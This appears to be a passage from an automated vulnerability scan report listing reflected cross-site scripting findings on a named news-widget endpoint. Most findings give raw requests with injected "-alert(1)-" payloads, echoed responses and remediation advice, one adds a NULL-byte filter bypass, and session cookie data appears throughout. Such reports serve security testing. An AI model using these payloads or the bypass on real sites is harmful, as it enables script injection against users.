HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:17:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=a53d1bvr9gop5u2dm4cgkdcom1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=a53d1bvr9gop5u2dm4cgkdcom1; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJhNTNkMWJ2cjlnb3A1dTJkbTRjZ2tkY29tMSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MjM7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... &title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=3e7ac"-alert(1)-"9567f8361f4") { scr = scripts[i]; break; } } } };
injectContainer = function() { // Unique container for widget HTML, hidden until filled so we aren't adding elem ...[SNIP]...
The value of the feed request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a07f5"-alert(1)-"5df8b136fe5 was submitted in the feed parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/jsona07f5"-alert(1)-"5df8b136fe5&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:12 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=g8vm5ljoqlr7t1vc6rnf14faf7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=g8vm5ljoqlr7t1vc6rnf14faf7; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJnOHZtNWxqb3Fscjd0MXZjNnJuZjE0ZmFmNyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNzI7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... <len; i++) { if (scripts[i].src == "http://www.publish2.com/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/jsona07f5"-alert(1)-"5df8b136fe5&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font ...[SNIP]...
The value of the feed_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7935e"-alert(1)-"5c48060a29b was submitted in the feed_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json7935e"-alert(1)-"5c48060a29b&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=afssah19gjfqofaibtf0q23ke6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=afssah19gjfqofaibtf0q23ke6; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJhZnNzYWgxOWdqZnFvZmFpYnRmMHEyM2tlNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNzY7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... <len; i++) { if (scripts[i].src == "http://www.publish2.com/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json7935e"-alert(1)-"5c48060a29b&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headli ...[SNIP]...
The value of the headline_font_color request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ffa"-alert(1)-"7699e70d999 was submitted in the headline_font_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=a3ffa"-alert(1)-"7699e70d999&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=1v234rqnfu61rgcjs76i325773; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=1v234rqnfu61rgcjs76i325773; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIxdjIzNHJxbmZ1NjFyZ2Nqczc2aTMyNTc3MyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MDU7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... sh2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=a3ffa"-alert(1)-"7699e70d999&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") { scr = scripts[i]; break; } } } };
The value of the headline_font_decoration request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64f8a"-alert(1)-"f0710704c2a was submitted in the headline_font_decoration parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=64f8a"-alert(1)-"f0710704c2a&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:50 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=thetfp6q0sq4lm24686c98ndc0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=thetfp6q0sq4lm24686c98ndc0; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJ0aGV0ZnA2cTBzcTRsbTI0Njg2Yzk4bmRjMCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MTA7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... et%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=64f8a"-alert(1)-"f0710704c2a&headline_font_weight=&comment_font_family=&comment_font_size=") { scr = scripts[i]; break; } } } };
The value of the headline_font_family request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1708"-alert(1)-"9b20a5116c1 was submitted in the headline_font_family parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=d1708"-alert(1)-"9b20a5116c1&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:36 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=om3dov2itai04v6n8rgv0k3nk2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=om3dov2itai04v6n8rgv0k3nk2; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJvbTNkb3YyaXRhaTA0djZuOHJndjBrM25rMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzOTY7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... pe=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=d1708"-alert(1)-"9b20a5116c1&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") { scr = scripts[i]; break; } }
The value of the headline_font_size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fad8d"-alert(1)-"f252e5b9e64 was submitted in the headline_font_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=fad8d"-alert(1)-"f252e5b9e64&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=8jgtl15njb1v6qjjvbjh06e4g1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=8jgtl15njb1v6qjjvbjh06e4g1; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI4amd0bDE1bmpiMXY2cWpqdmJqaDA2ZTRnMSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MDE7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... ttp%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=fad8d"-alert(1)-"f252e5b9e64&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") { scr = scripts[i]; break; } } } };
The value of the headline_font_weight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 580e5"-alert(1)-"142a37c3c4c was submitted in the headline_font_weight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=580e5"-alert(1)-"142a37c3c4c&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:54 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=sq9q1jcbih2sepgpf3hdlclse0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=sq9q1jcbih2sepgpf3hdlclse0; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJzcTlxMWpjYmloMnNlcGdwZjNoZGxjbHNlMCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MTQ7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... ists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=580e5"-alert(1)-"142a37c3c4c&comment_font_family=&comment_font_size=") { scr = scripts[i]; break; } } } };
2.397. http://www.publish2.com/syndicate/widget/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.publish2.com
Path:
/syndicate/widget/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0088f8f"-alert(1)-"9893ef1728b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88f8f"-alert(1)-"9893ef1728b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /syndicate/widget/?%0088f8f"-alert(1)-"9893ef1728b=1 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:20 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:19 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:19 GMT; path=/ Set-Cookie: kohanasession=hm3833egcpi9dk4u46kugqmcc5; path=/ Set-Cookie: kohanasession=hm3833egcpi9dk4u46kugqmcc5; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJobTM4MzNlZ2NwaTlkazR1NDZrdWdxbWNjNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM4MDs%3D; path=/ Content-Length: 2548 Connection: close Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... <len; i++) { if (scripts[i].src == "http://www.publish2.com/syndicate/widget/?%0088f8f"-alert(1)-"9893ef1728b=1") { scr = scripts[i]; break; } } } };
injectContainer = function() { // Unique container for widget HTML, hidden until filled so we aren't adding el ...[SNIP]...
The value of the number_of_items request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0532"-alert(1)-"46d4c29db7a was submitted in the number_of_items parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5c0532"-alert(1)-"46d4c29db7a&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
